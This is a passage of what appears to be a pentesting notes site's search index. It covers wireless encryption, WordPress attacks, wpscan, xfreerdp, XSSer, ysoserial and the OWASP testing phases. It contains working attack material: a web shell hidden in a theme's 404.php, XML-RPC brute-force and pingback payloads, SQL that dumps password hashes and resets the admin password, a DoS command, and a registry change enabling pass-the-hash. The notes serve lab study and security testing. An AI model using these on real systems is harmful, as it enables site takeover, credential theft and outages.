        "},{"location":"wireless-security/#wep-challenge-response-handshake","title":"WEP Challenge-Response Handshake","text":"Step Who Description 1 Client Sends an association request packet to the WAP, requesting access. 2 WAP Responds with an association response packet to the client, which includes a challenge string. 3 Client Calculates a response to the challenge string and a shared secret key and sends it back to the WAP. 4 WAP Calculates the expected response to the challenge with the same shared secret key and sends an authentication response packet to the client.

        Nevertheless, some packets can get lost, so the so-called CRC checksum has been integrated. Cyclic Redundancy Check (CRC) is an error-detection mechanism used in the WEP protocol to protect against data corruption in wireless communications.

        "},{"location":"wireless-security/#encryption-protocols","title":"Encryption Protocols","text":"

        We can use various encryption algorithms to protect the confidentiality of data transmitted over wireless networks. The most common encryption algorithms in WiFi networks are Wired Equivalent Privacy (WEP), WiFi Protected Access 2 (WPA2), and WiFi Protected Access 3 (WPA3).

        "},{"location":"wireless-security/#wired-equivalent-privacy-wep","title":"Wired Equivalent Privacy: WEP","text":"

        Very week with 63-bit and 128-bit encryption keys.

        WEP uses the RC4 cipher encryption algorithm, which makes it vulnerable to attacks.

        Passwords can be crack in minutes.

        Superseded by WPA in 2003

        "},{"location":"wireless-security/#wi-fi-protected-access-wpa","title":"Wi-Fi Protected Access: WPA","text":"

        Developed by Wi-Fi Alliance

        Massive security improvement over WEP with 256-bit encryption keys.

        Superseded by WPA2 in 2006.

        "},{"location":"wmctrl/","title":"wmctrl","text":"
        sudo apt-get install wmctrl\n
        #!/bin/bash\nwmctrl -s 0\n/bin/bash\nfirefox https://enterprise.hackthebox.com/login &\nobsidian &\nGoogle Chrome &\nriseup-vpn --start-vpn on \nsleep 5\nwmctrl -r /bin/bash -t 0\nwmctrl -r firefox -t 1\nwmctrl -r obsidian -t 2\nwmctrl -r riseup-vpn -t 3\nwmctrl -s 0\n
        "},{"location":"wordpress-pentesting/","title":"Pentesting wordpress","text":"","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#important-wordpress-files-and-directories","title":"Important wordpress files and directories","text":"

        Login/Authentication

        • /wp-login.php (This is usually changed to /login.php for security)
        • /wp-admin/login.php
        • /wp-admin/wp-login.php
        • xmlrpc.php - (Extensible Markup Language - Remote Procedure Call) is a protocol that allows external applications and services to interact with a WordPress site programmatically. This has been replaced by the WordPress REST API.

        Directories

        • /wp-content - Primary directory used to store plugins and themes.
        • /wp-content/uploads/ - Directory where uploaded files are stored (Usually prone to directory listing).
        • /wp-config.php - Contains information required by WordPress to connect to a database. (Contains database credentials)
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#enumeration","title":"Enumeration","text":"","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#dorking-techniques","title":"Dorking techniques","text":"
        inurl:\"/xmlrpc.php?rsd\" + scoping restrictions\n\nintitle:\"WordPress\" inurl:\"readme.html\" + scoping restrictions = general wordpress detection\n\nallinurl:\"wp-content/plugins/\" + scoping restrictions = general wordpress detection\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wordpress-version","title":"Wordpress version","text":"
        # Using curl for getting generator meta tag\ncurl -s -X GET https://example.com | grep '<meta name=\"generator\"'\n\n# Using curl for getting version from src files \ncurl -s -X GET <URL> | grep http | grep -E '?ver' | sed -E 's,href==|src=,THIIIIS,g' | awk -F \"THIIIIS\" '{print $2}' | cut -d \"'\" -f2\n

        Manual techniques

        • Check WordPress Meta Generator Tag.
        • Check the WordPress readme.html/license.txt file.
        • Inspect HTTP response headers for version information (X-Powered-By).
        • Check the login page for the WordPress version as it is usually displayed.
        • Check the WordPress REST API and look for the version field in the JSON response (http://example.com/wp-json/)
        • Analyze JS and CSS files for version information.
        • Examine the WordPress changelog files with information on version updates. Look for files like changelog.txt or readme.txt in the WordPress directory
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#plugin-enumeration","title":"Plugin enumeration","text":"
        # curl\ncurl -s -X GET http://example.com | sed 's/href=/\\n/g' | sed 's/src=/\\n/g' | grep 'wp-content/plugins/*' | cut -d\"'\" -f2\n\n# wpscan\nwpscan --url http://<TARGET> --plugins-detection passive\n# Modes: -mixed (default), -passive or -active\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#themes-enumeration","title":"Themes enumeration","text":"
        # Using curl\ncurl -s -X GET http://example.com | sed 's/href=/\\n/g' | sed 's/src=/\\n/g' | grep 'themes' | cut -d\"'\" -f2\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#user-enumeration","title":"User enumeration","text":"
        # Using curl\ncurl -s -I -X GET http://blog.inlanefreight.com/?author=1\n\n# json enumeration\ncurl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq\n\n# wpscan\nwpscan --url https://target.tld/domain --enumerate u\nwpscan --url https://target.tld/ -eu\n\n# Enumerate a range of users 1-100\nwpscan --url https://target.tld/ --enumerate u1-100\nwpscan --url http://46.101.13.204:31822 --plugins-detection passive\n

        Manual method: users in wordpress have unique identifiers. Usually first user in wordpress has id 1. Second user, id 2. So in the browser you can write:

        http://example.com/wordpressPath?author=1\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#nmap-enumeration","title":"nmap enumeration","text":"
        # List nmap scripts related to wordpress\nls -la /usr/share/nmap/scripts | grep wordpress\n

        Results:

        -rw-r--r-- 1 root root  5061 Nov  1 22:10 http-wordpress-brute.nse\n-rw-r--r-- 1 root root 10866 Nov  1 22:10 http-wordpress-enum.nse\n-rw-r--r-- 1 root root  4641 Nov  1 22:10 http-wordpress-users.nse\n

        Running one of them:

        # General enumeration\nsudo nmap -sS -sV --script=http-wordpress-enum <TARGETwithnohttp> \n\n# Plugins enumeration\nsudo nmap -sS -sV --script=http-wordpress-enum --script-args type=\"plugins\" <TARGETwithnohttp> -p 80,443\n\n# User enumeration\nsudo nmap -sS -sV --script=http-wordpress-users <TARGETwithnohttp> \n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#brute-force-attack-on-login","title":"Brute force attack on login","text":"

        Usually, login form is located at example.com/wp-admin/login.php

        But sometimes, login form is hidden under a different path. There exist plugins to do so.

        # Brute force attack with passwords\nwpscan --url HOST/domain -usernames admin, webadmin  --password-attack wp-login -passwords filename.txt\n# -usernames: those users that you are going to brute force\n# --password-attack: your URI target (different in the case of the WP api\n# -passwords: path/to/dictionary.txt\n\n\nwpscan --url  <targetURLnohttp> -U admin -P /usr/share/wordlists/rockyou.txt   \n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#enumerating-files-and-folders","title":"Enumerating files and folders","text":"
        # Using gobuster\ngobuster dir --url https://example.com --wordlist /usr/share/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt -b '404'\n

        Check out if directory listing is enabled.

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wordpress-xmlrpc-attacks","title":"WordPress xmlrpc attacks","text":"

        XML-RPC on WordPress is actually an API that allows developers who make 3rd party application and services the ability to interact to your WordPress site. The XML-RPC API that WordPress provides several key functionalities that include:

        • Publish a post.
        • Edit a post.
        • Delete a post.
        • Upload a new file (e.g. an image for a post).
        • Get a list of comments.
        • Edit comments.

        XML-RPC functionality is turned on by default since WordPress 3.5. Therefore, normal installation of wordpress allows us to perform two type of attacks:

        • XML-rpc ping attacks.
        • Brute force attack.

        Before attacking, we need to make sure that there exist XML-RPC servers on the wordpress installation:

        1. Ensure you have access to the xmlrpc.php file (usually at https://example.com/xmlrpc.php).

        2. Send a POST request: .

        POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 135\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<methodCall> \n<methodName>system.listMethods</methodName> \n<params></params> \n</methodCall>\n

        Same request with curl would be:

        curl -X POST -d \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?> <methodCall> <methodName>system.listMethods</methodName> <params></params></methodCall>\" http://example.com/xmlrpc.php\n

        Normal response to this request would be listing all available methods.

        This is how you trigger the method blogger.getUsersBlogs:

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-brute-force-attack","title":"XML-RPC brute force attack","text":"

        With wpscan:

        wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://<TARGET>\n

        Use BurpSuite Intruder to send this request:

        POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 235\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall> \n<methodName>wp.getUsersBlogs</methodName> \n<params> \n<param><value>\\{\\{your username\\}\\}</value></param> \n<param><value>\\{\\{your password\\}\\}</value></param> \n</params> \n</methodCall>\n

        You can also perform a single request, and brute force hundreds of passwords. For that you need to use both system.multicall and wp.getUsersBlogs methods:

        POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 1560\n\n<?xml version=\"1.0\"?>\n<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n</data></array></value></param></params></methodCall>\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-uploading-a-file","title":"XML-RPC uploading a file","text":"

        Using the correct credentials you can upload a file. In the response the path will appears (source for this: hacktricks):

        <?xml version='1.0' encoding='utf-8'?>\n<methodCall>\n    <methodName>wp.uploadFile</methodName>\n    <params>\n        <param><value><string>1</string></value></param>\n        <param><value><string>username</string></value></param>\n        <param><value><string>password</string></value></param>\n        <param>\n            <value>\n                <struct>\n                    <member>\n                        <name>name</name>\n                        <value><string>filename.jpg</string></value>\n                    </member>\n                    <member>\n                        <name>type</name>\n                        <value><string>mime/type</string></value>\n                    </member>\n                    <member>\n                        <name>bits</name>\n                        <value><base64><![CDATA[---base64-encoded-data---]]></base64></value>\n                    </member>\n                </struct>\n            </value>\n        </param>\n    </params>\n</methodCall>\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-distributed-denial-of-service-ddos-attacks","title":"XML-RPC pingback attack: Distributed denial-of-service (DDoS) attacks","text":"

        An attacker executes the pingback.ping the method from several affected WordPress installations against a single unprotected target (botnet level).

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-cloudflare-protection-bypass","title":"XML-RPC pingback attack: Cloudflare Protection Bypass","text":"

        An attacker executes the pingback.ping the method from a single affected WordPress installation which is protected by CloudFlare to an attacker-controlled public host (for example a VPS) in order to reveal the public IP of the target, therefore bypassing any DNS level protection.

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-xspa-cross-site-port-attack","title":"XML-RPC pingback attack: XSPA (Cross Site Port Attack)","text":"

        An attacker can execute the pingback.ping the method from a single affected wordpress installation to the same host (or other internal/private host) on different ports. An open port or an internal host can be determined by observing the difference in time of response and/or by looking at the response of the request.

        The following represents an simple example request using the Burpsuite Collaborator provided URL as callback:

        POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 303\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n<methodName>pingback.ping</methodName>\n<params>\n<param>\n<value><string>https://pdaskjdasas23fselrkfdsf.oastify.com/1562017983221-4377199190203</string></value>\n</param>\n<param>\n<value><string>https://example.com/</string></value>\n</param>\n</params>\n</methodCall>\n
        # Brute force with curl\ncurl -X POST -d \"<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>\" http://blog.inlanefreight.com/xmlrpc.php\n\n# If the credentials are not valid, we will receive a 403 faultCode error.\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#rce-attack-on-wordpress","title":"RCE attack on wordpress","text":"

        Once you have credentials for user admin, access the admin panel and introduce a web shell. Where? Appearance > Theme editor. Choose a theme not in use and edit 404.php to add the shell. This is a quiet way not to be noticed.

        At the end of the file, you can add:

        system($_GET['cmd']);\n

        Exploitation:

        curl -X GET \"http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id\"\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#metasploit-modules","title":"Metasploit modules","text":"
        use exploit/unix/webapp/wp_admin_shell_upload\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#interesting-files","title":"Interesting files","text":"

        If somehow we get our hands on wp-config.php, then we will be able to see credentials to database.

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#post-exploitation","title":"Post Exploitation","text":"

        Extract usernames and passwords:

        mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e \"use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;\"\n

        Change admin password:

        mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e \"use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;\"\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wp-cronphp-attack","title":"wp-cron.php attack","text":"

        The WordPress application is vulnerable to a Denial of Service (DoS) attack via the wp-cron.php script. This script is used by WordPress to perform scheduled tasks, such as publishing scheduled posts, checking for updates, and running plugins.

        An attacker can exploit this vulnerability by sending a large number of requests to the wp-cron.php script, causing it to consume excessive resources and overload the server. This can lead to the application becoming unresponsive or crashing, potentially causing data loss and downtime.

        Steps to Reproduce:

        • Get the doser.py script at https://github.com/Quitten/doser.py
        • Use this command to run the script:
        python3 doser.py -t 999 -g 'https://\u2588\u2588\u2588\u2588\u2588/wp-cron.php'\n
        • Go to https://\u2588\u2588\u2588\u2588 after 1000 requests of the doser.py script. The site returns code 502. See the video PoC.

        To mitigate this vulnerability, it is recommended to disable the default WordPress wp-cron.php script and set up a server-side cron job instead. Here are the steps to disable the default wp-cron.php script and set up a server-side cron job:

        1. Access your website\u2019s root directory via FTP or cPanel File Manager.
        2. Locate the wp-config.php file and open it for editing.
        3. Add the following line of code to the file, just before the line that says \u201cThat\u2019s all, stop editing! Happy publishing.\u201d:
        define('DISABLE_WP_CRON',\u00a0true);\n
        1. Save the changes to the wp-config.php file.
        2. Set up a server-side cron job to run the wp-cron.php script at the desired interval. This can be done using the server\u2019s control panel or by editing the server\u2019s crontab file.
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#tools","title":"Tools","text":"

        wpscan

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wpscan/","title":"wpscan - Wordpress Security Scanner","text":"","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#installation","title":"Installation","text":"

        Preinstalled in kali.

        See the repo: https://github.com/wpscanteam/wpscan.

        WPScan keeps a local database of metadata that is used to output useful information, such as the latest version of a plugin. The local database can be updated with the following command:

        wpscan --update\n
        ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#basic-commands","title":"Basic commands","text":"
        # Enumerate users\nwpscan --url https://target.tld/domain --enumerate u\nwpscan --url https://target.tld/ -eu\n\n# Enumerate a range of users 1-100\nwpscan --url https://target.tld/ --enumerate u1-100\nwpscan --url http://46.101.13.204:31822 --plugins-detection passive\n\n# Brute force attack on login page with passwords:\nwpscan --url HOST/domain -usernames admin, webadmin  --password-attack wp-login -passwords filename.txt\n# -usernames: those users that you are going to brute force\n# --password-attack: your URI target (different in the case of the WP api\n# -passwords: path/to/dictionary.txt\n\n# Brute force attack on xmlrpc with passwords:\nwpscan --password-attack xmlrpc -t 20 -U username1, username2 -P PATH/TO/passwords.txt --url http://<TARGET>\n\n\n# Enumerate plugins on pasive mode \nwpscan --url https://target.tld/ --plugins-detection passive \n# Modes: -mixed (default), -passive or -active\n\n# Common flags\n#   vp (Vulnerable plugins)\n#   ap (All plugins)\n#   p (Popular plugins)\n#   vt (Vulnerable themes)\n#   at (All themes)\n#   t (Popular themes)\n#   tt (Timthumbs)\n#   cb (Config backups)\n#   dbe (Db exports)\n#   u (User IDs range. e.g: u1-5)\n#   m (Media IDs range. e.g m1-15)\n\n# Ignore HTTPS Certificate\n--disable-tls-checks\n
        ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#examples-from-labs","title":"Examples from labs:","text":"
        # Raven 1 machine\nwpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n
        ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"xfreerdp/","title":"xfreerdp","text":"

        xfreerdp is an X11 Remote Desktop Protocol (RDP) client which is part of the FreeRDP project. An RDP server is built-in to many editions of Windows.

        ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#installation","title":"Installation","text":"

        To install xfreerdp, proceed with the following command:

        sudo apt-get install freerdp2-x11\n
        ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#basic-commands","title":"Basic commands","text":"
        # No password indicated. When prompted for one, click Enter and see if it allows us to login\nxfreerdp [/d:domain] /u:<username> /v:$ip\n\nxfreerdp [/d:domain] /u:<username> /p:<password> /v:$ip\n# /v:{target_IP} : Specifies the target IP of the host we would like to connect to.\n\nxfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip\n# /pth:<hash>   Pass the hash\n
        ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#troubleshoot-in-pth-attack","title":"Troubleshoot in PtH attack","text":"

        Restricted Admin Mode, which is disabled by default, should be enabled on the target host; otherwise, you will be presented with an error. This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa with the value of 0. It can be done using the following command:

        reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n

        Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access.

        ","tags":["tools","windows","rdp"]},{"location":"xsltproc/","title":"xsltproc","text":"

        xsltproc is a command line tool for applying XSLT stylesheets to XML documents.

        ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsltproc/#installation","title":"Installation","text":"

        Preinstalled in kali. See oficial site: http://xmlsoft.org/xslt/xsltproc.html

        ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsltproc/#basic-usage","title":"Basic usage","text":"
        xsltproc target.xml -o target.html\n
        ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsser/","title":"XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities","text":"

        A Cross Site Scripter (or XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. It contains several options to try to bypass certain filters, and various special techniques of code injection. XSSer has pre-installed ( > 1300 XSS ) attacking vectors and can bypass-exploit code on several browsers/WAFs.

        ","tags":["pentesting","web pentesting"]},{"location":"xsser/#installation","title":"Installation","text":"
        sudo apt install xsser\n
        ","tags":["pentesting","web pentesting"]},{"location":"xsser/#usage","title":"Usage","text":"

        Capture with BurpSuite a POST request and fuzz it with XSSER:

        xsser --url \"http://demo.ine.local/index.php?page=dns-lookup.php\" -p \"target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS\" --auto\n# --url: to introduce the target\n# -p: Payload (it's the body of the POST request captured with Burpsuite). Use the characters 'XSS' to indicate where you want to inject the payloads that xsser is going to fuzz.\n#--auto: Inject a list of vectors provided by XSSer.\n# In the results you will have a confirmation about that parameter being injectable, and an example of payload. Use it for launching the Final Payload (-Fp).\n\nxsser --url \"http://demo.ine.local/index.php?page=dns-lookup.php\" -p \"target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS\" --Fp \"<script>alert(1)</script>\"\n

        With this, the encoded XSS payload is generated. Now, in Burp Suite, replace the POST parameters with the final attack payload and forward the request.

        Launch the XSSer interface:

        xsser --gtk\n
        ","tags":["pentesting","web pentesting"]},{"location":"ysoserial/","title":"ysoserial - A tool for Java deserialization","text":"","tags":["webpentesting","tools","deserialization","java"]},{"location":"ysoserial/#installation","title":"Installation","text":"

        Repository: https://github.com/frohoff/ysoserial

        git clone https://github.com/frohoff/ysoserial.git\n

        Requires Java 1.7+ and Maven 3.x+

        sudo apt-get install maven\n

        As ysoserial presented some issues with java 21 version, be sure of your version

        java --version\n

        Check your installations:

        sudo update-alternatives --config java\n

        Results:

          Selection    Path                                         Priority   Status\n------------------------------------------------------------\n* 0            /usr/lib/jvm/java-21-openjdk-amd64/bin/java   2111      auto mode\n  1            /usr/lib/jvm/java-17-openjdk-amd64/bin/java   1711      manual mode\n  2            /usr/lib/jvm/java-21-openjdk-amd64/bin/java   2111      manual mode\n

        Download Java 11:

        sudo apt-get install openjdk-11-jdk \n

        Run again

        sudo update-alternatives --config java\n

        And select the new installation. Then check out java version:

        Additional debugging: Java not found in \u201cupdate-alternatives \u2014 config java\u201d after installing java on linux

        After using ysoserial you may reconfigure to use your latest java version.

        Build the app:

        mvn clean package -DskipTests\n
        ","tags":["webpentesting","tools","deserialization","java"]},{"location":"ysoserial/#basic-usage","title":"Basic usage","text":"
        java -jar ysoserial-all.jar [payload] \"[command]\"\n

        See lab: Burpsuite Lab

        In Java versions 16 and above, you need to set a series of command-line arguments for Java to run ysoserial. For example:

        java -jar ysoserial-all.jar \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \\ --add-opens=java.base/java.net=ALL-UNNAMED \\ --add-opens=java.base/java.util=ALL-UNNAMED \\ [payload] '[command]'\n
        ","tags":["webpentesting","tools","deserialization","java"]},{"location":"OWASP/","title":"OWASP Web Security Testing Guide","text":"Phase Name of phase Objectives 1 Pre\u2013Engagement Define the scope and objectives of the penetration test, including the target web application, URLs, and functionalities to be tested. Obtain proper authorization and permission from the application owner to conduct the test. Gather relevant information about the application, such as technologies used, user roles, and business-critical functionalities. 2 Information Gathering & Reconnaissance Perform passive reconnaissance to gather publicly available information about the application and its infrastructure. Enumerate subdomains, directories, and files to discover hidden or sensitive content. Use tools like \"Nmap\" to identify open ports and services running on the web server. Utilize \"Google Dorks\" to find indexed information, files, and directories on the target website. 3 Threat Modeling Analyze the application's architecture and data flow to identify potential threats and attack vectors. Build an attack surface model to understand how attackers can interact with the application. Identify potential high-risk areas and prioritize testing efforts accordingly. 4 Vulnerability Scanning Use automated web vulnerability scanners like \"Burp Suite\" or \"OWASP ZAP\" to identify common security flaws. Verify and validate the scan results manually to eliminate false positives and false negatives. 5 Manual Testing & Exploitation Perform manual testing to validate and exploit identified vulnerabilities in the application. Test for input validation issues, authentication bypass, authorization flaws, and business logic vulnerabilities. Attempt to exploit security flaws to demonstrate their impact and potential risk to the application. 6 Authentication & Authorization Testing Test the application's authentication mechanisms to identify weaknesses in password policies, session management, and account lockout procedures. Evaluate the application's access controls to ensure that unauthorized users cannot access sensitive functionalities or data. 7 Session Management Testing Evaluate the application's session management mechanisms to prevent session fixation, session hijacking, and session-related attacks. Check for session timeout settings and proper session token handling. 8 Information Disclosure Review how the application handles sensitive information such as passwords, user data, and confidential files. Test for information disclosure through error messages, server responses, or improper access controls. 9 Business Logic Testing Analyze the application's business logic to identify flaws that could lead to unauthorized access or data manipulation. Test for order-related vulnerabilities, privilege escalation, and other business logic flaws. 10 Client-Side Testing Evaluate the client-side code (HTML, JavaScript) for potential security vulnerabilities, such as DOM-based XSS. Test for insecure client-side storage and sensitive data exposure. 11 Reporting & Remediation Document and prioritize the identified security vulnerabilities and risks. Provide a detailed report to developers and stakeholders, including recommendations for remediation. Assist developers in fixing the identified security issues and retesting the application to ensure that the fixes were successful. 12 Post-Engagement Conduct a post-engagement meeting to discuss the test results with stakeholders. Provide security awareness training to the development team to promote secure coding practices.

        Other methodologies: http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines PTES is a complete penetration testing methodology that covers all aspects of security assessments, including web application testing. It provides a structured approach from pre-engagement through reporting and follow-up, making it suitable for comprehensive assessments

        ","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#1-information-gathering","title":"1. Information Gathering","text":"1. Information Gathering ID Link to Hackinglife Link to OWASP Description 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services). 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities. 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, \\ tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand. 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage.- Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist. 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message. 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs, Network and Security: Reverse proxy, IPS, WAF","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#2-configuration-and-deploy-management-testing","title":"2. Configuration and Deploy Management Testing","text":"2. Configuration and Deploy Management Testing ID Link to Hackinglife Link to OWASP Description 2.1 WSTG-CONF-01 Test Network Infrastructure Configuration - Review the applications' configurations set across the network and validate that they are not vulnerable. - Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials. 2.2 WSTG-CONF-02.md Test Application Platform Configuration - Ensure that defaults and known files have been removed. - Review configuration and server handling (40, 50) - Validate that no debugging code or extensions are left in the production environments. - Review the logging mechanisms set in place for the application including Log Location, Log Storage , Log Rotation, Log Access Control, Log Review 2.3 WSTG-CONF-03.md Test File Extensions Handling for Sensitive Information - Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.). - Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc) - Validate that no system framework bypasses exist on the rules set. 2.4 WSTG-CONF-04 Review Old Backup and Unreferenced Files for Sensitive Information - Find and analyse unreferenced files that might contain sensitive information. - Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename 2.5 WSTG-CONF-05 Enumerate Infrastructure and Application Admin Interfaces - Identify hidden administrator interfaces and functionality. - Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080) 2.6 WSTG-CONF-06 Test HTTP Methods - Enumerate supported HTTP methods using OPTIONS. - Test for access control bypass (GET->HEAD->FOO). - Test HTTP method overriding techniques. 2.7 WSTG-CONF-07 Test HTTP Strict Transport Security - Review the HSTS header and its validity. - Identify HSTS header on Web server through HTTP response header: curl -s -D- https://domain.com/ | 2.8 WSTG-CONF-08 Test RIA Cross Domain Policy Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from. 2.9 WSTG-CONF-09 Test File Permission - Review and Identify any rogue file permissions. - Identify configuration file whose permissions are set to world-readable from the installation by default. 2.10 WSTG-CONF-10 Test for Subdomain Takeover - Enumerate all possible domains (previous and current). - Identify forgotten or misconfigured domains. 2.11 WSTG-CONF-11 Test Cloud Storage - Assess that the access control configuration for the storage services is properly in place. 2.12 WSTG-CONF-12 Testing for Content Security Policy - Review the Content-Security-Policy header or meta element to identify misconfigurations. 2.13 WSTG-CONF-13 Test Path Confusion - Make sure application paths are configured correctly.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#3-identity-management-testing","title":"3. Identity Management Testing","text":"3. Identity Management Testing ID Link to Hackinglife Link to OWASP Description 3.1 WSTG-IDNT-01 Test Role Definitions - Identify and document roles used by the application. - Attempt to switch, change, or access another role. - Review the granularity of the roles and the needs behind the permissions given. 3.2 WSTG-IDNT-02 Test User Registration Process - Verify that the identity requirements for user registration are aligned with business and security requirements. - Validate the registration process. 3.3 WSTG-IDNT-03 Test Account 